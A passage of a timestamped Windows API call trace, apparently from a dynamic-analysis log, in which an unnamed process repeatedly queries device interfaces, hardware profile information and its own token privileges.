Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.069] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.069] GetLastError () returned 0x578 [0017.069] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.069] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.069] GetCurrentThread () returned 0xfffffffe [0017.069] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.069] GetLastError () returned 0x3f0 [0017.069] GetCurrentProcess () returned 0xffffffff [0017.069] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.069] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.069] SetLastError (dwErrCode=0x522) [0017.069] CloseHandle (hObject=0x114) returned 1 [0017.069] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.069] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.069] GetLastError () returned 0x578 [0017.069] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.069] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.069] GetCurrentThread () returned 0xfffffffe [0017.069] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.069] GetLastError () returned 0x3f0 [0017.069] GetCurrentProcess () returned 0xffffffff [0017.069] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.069] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.069] SetLastError (dwErrCode=0x522) [0017.069] CloseHandle (hObject=0x114) returned 1 [0017.069] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.069] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.069] GetLastError () returned 0x578 [0017.069] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.069] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.069] GetCurrentThread () returned 0xfffffffe [0017.069] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.069] GetLastError () returned 0x3f0 [0017.069] GetCurrentProcess () returned 0xffffffff [0017.069] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.069] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.070] SetLastError (dwErrCode=0x522) [0017.070] CloseHandle (hObject=0x114) returned 1 [0017.070] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.070] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.070] GetLastError () returned 0x578 [0017.070] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.070] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.070] GetCurrentThread () returned 0xfffffffe [0017.070] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.070] GetLastError () returned 0x3f0 [0017.070] GetCurrentProcess () returned 0xffffffff [0017.070] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.070] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.070] SetLastError (dwErrCode=0x522) [0017.070] CloseHandle (hObject=0x114) returned 1 [0017.070] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.070] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.070] GetLastError () returned 0x578 [0017.070] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.070] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.070] GetCurrentThread () returned 0xfffffffe [0017.070] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.070] GetLastError () returned 0x3f0 [0017.070] GetCurrentProcess () returned 0xffffffff [0017.070] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.070] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.070] SetLastError (dwErrCode=0x522) [0017.070] CloseHandle (hObject=0x114) returned 1 [0017.070] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.070] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.070] GetLastError () returned 0x578 [0017.070] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.070] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.070] GetCurrentThread () returned 0xfffffffe [0017.070] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.070] GetLastError () returned 0x3f0 [0017.070] GetCurrentProcess () returned 0xffffffff [0017.070] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.070] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.071] SetLastError (dwErrCode=0x522) [0017.071] CloseHandle (hObject=0x114) returned 1 [0017.071] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.071] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.071] GetLastError () returned 0x578 [0017.071] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.071] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.071] GetCurrentThread () returned 0xfffffffe [0017.071] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.071] GetLastError () returned 0x3f0 [0017.071] GetCurrentProcess () returned 0xffffffff [0017.071] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.071] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.071] SetLastError (dwErrCode=0x522) [0017.071] CloseHandle (hObject=0x114) returned 1 [0017.071] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.071] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.071] GetLastError () returned 0x578 [0017.071] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.071] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.071] GetCurrentThread () returned 0xfffffffe [0017.071] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.071] GetLastError () returned 0x3f0 [0017.071] GetCurrentProcess () returned 0xffffffff [0017.071] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.071] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.071] SetLastError (dwErrCode=0x522) [0017.071] CloseHandle (hObject=0x114) returned 1 [0017.071] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.071] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.071] GetLastError () returned 0x578 [0017.071] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.071] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.071] GetCurrentThread () returned 0xfffffffe [0017.071] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.071] GetLastError () returned 0x3f0 [0017.071] GetCurrentProcess () returned 0xffffffff [0017.071] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.072] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.072] SetLastError (dwErrCode=0x522) [0017.072] CloseHandle (hObject=0x114) returned 1 [0017.072] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.072] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.072] GetLastError () returned 0x578 [0017.072] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.072] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.072] GetCurrentThread () returned 0xfffffffe [0017.072] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.072] GetLastError () returned 0x3f0 [0017.072] GetCurrentProcess () returned 0xffffffff [0017.072] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.072] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.072] SetLastError (dwErrCode=0x522) [0017.072] CloseHandle (hObject=0x114) returned 1 [0017.072] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.072] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.072] GetLastError () returned 0x578 [0017.072] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.072] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.072] GetCurrentThread () returned 0xfffffffe [0017.072] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.072] GetLastError () returned 0x3f0 [0017.072] GetCurrentProcess () returned 0xffffffff [0017.072] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.072] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.072] SetLastError (dwErrCode=0x522) [0017.072] CloseHandle (hObject=0x114) returned 1 [0017.072] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.072] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.072] GetLastError () returned 0x578 [0017.072] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.072] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.072] GetCurrentThread () returned 0xfffffffe [0017.073] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.073] GetLastError () returned 0x3f0 [0017.073] GetCurrentProcess () returned 0xffffffff [0017.073] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.073] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.073] SetLastError (dwErrCode=0x522) [0017.073] CloseHandle (hObject=0x114) returned 1 [0017.073] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.073] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.073] GetLastError () returned 0x578 [0017.073] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.073] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.073] GetCurrentThread () returned 0xfffffffe [0017.073] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.073] GetLastError () returned 0x3f0 [0017.073] GetCurrentProcess () returned 0xffffffff [0017.073] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.073] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.073] SetLastError (dwErrCode=0x522) [0017.073] CloseHandle (hObject=0x114) returned 1 [0017.073] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.073] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.073] GetLastError () returned 0x578 [0017.073] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.073] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.073] GetCurrentThread () returned 0xfffffffe [0017.073] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.073] GetLastError () returned 0x3f0 [0017.073] GetCurrentProcess () returned 0xffffffff [0017.073] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.073] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.073] SetLastError (dwErrCode=0x522) [0017.073] CloseHandle (hObject=0x114) returned 1 [0017.073] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.073] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.073] GetLastError () returned 0x578 [0017.074] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.074] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.074] GetCurrentThread () returned 0xfffffffe [0017.074] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.074] GetLastError () returned 0x3f0 [0017.074] GetCurrentProcess () returned 0xffffffff [0017.074] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.074] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.074] SetLastError (dwErrCode=0x522) [0017.074] CloseHandle (hObject=0x114) returned 1 [0017.074] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.074] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.074] GetLastError () returned 0x578 [0017.074] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.074] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.074] GetCurrentThread () returned 0xfffffffe [0017.074] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.074] GetLastError () returned 0x3f0 [0017.074] GetCurrentProcess () returned 0xffffffff [0017.074] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.074] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.074] SetLastError (dwErrCode=0x522) [0017.074] CloseHandle (hObject=0x114) returned 1 [0017.074] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.074] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.074] GetLastError () returned 0x578 [0017.074] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.074] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.074] GetCurrentThread () returned 0xfffffffe [0017.074] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.074] GetLastError () returned 0x3f0 [0017.074] GetCurrentProcess () returned 0xffffffff [0017.074] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.074] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.074] SetLastError (dwErrCode=0x522) [0017.074] CloseHandle (hObject=0x114) returned 1 [0017.075] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.075] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.075] GetLastError () returned 0x578 [0017.075] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.075] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.075] GetCurrentThread () returned 0xfffffffe [0017.075] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.075] GetLastError () returned 0x3f0 [0017.075] GetCurrentProcess () returned 0xffffffff [0017.075] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.075] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.075] SetLastError (dwErrCode=0x522) [0017.075] CloseHandle (hObject=0x114) returned 1 [0017.075] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.075] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.075] GetLastError () returned 0x578 [0017.075] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.075] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.075] GetCurrentThread () returned 0xfffffffe [0017.075] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.075] GetLastError () returned 0x3f0 [0017.075] GetCurrentProcess () returned 0xffffffff [0017.075] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.075] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.075] SetLastError (dwErrCode=0x522) [0017.075] CloseHandle (hObject=0x114) returned 1 [0017.075] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.075] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.075] GetLastError () returned 0x578 [0017.075] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.075] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.075] GetCurrentThread () returned 0xfffffffe [0017.075] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.075] GetLastError () returned 0x3f0 [0017.075] GetCurrentProcess () returned 0xffffffff [0017.075] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.075] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.075] SetLastError (dwErrCode=0x522) [0017.075] CloseHandle (hObject=0x114) returned 1 [0017.076] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.076] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.076] GetLastError () returned 0x578 [0017.076] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.076] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.076] GetCurrentThread () returned 0xfffffffe [0017.076] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.076] GetLastError () returned 0x3f0 [0017.076] GetCurrentProcess () returned 0xffffffff [0017.076] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.076] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.076] SetLastError (dwErrCode=0x522) [0017.076] CloseHandle (hObject=0x114) returned 1 [0017.076] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.076] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.076] GetLastError () returned 0x578 [0017.076] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.076] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.076] GetCurrentThread () returned 0xfffffffe [0017.076] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.076] GetLastError () returned 0x3f0 [0017.076] GetCurrentProcess () returned 0xffffffff [0017.076] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.076] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.076] SetLastError (dwErrCode=0x522) [0017.076] CloseHandle (hObject=0x114) 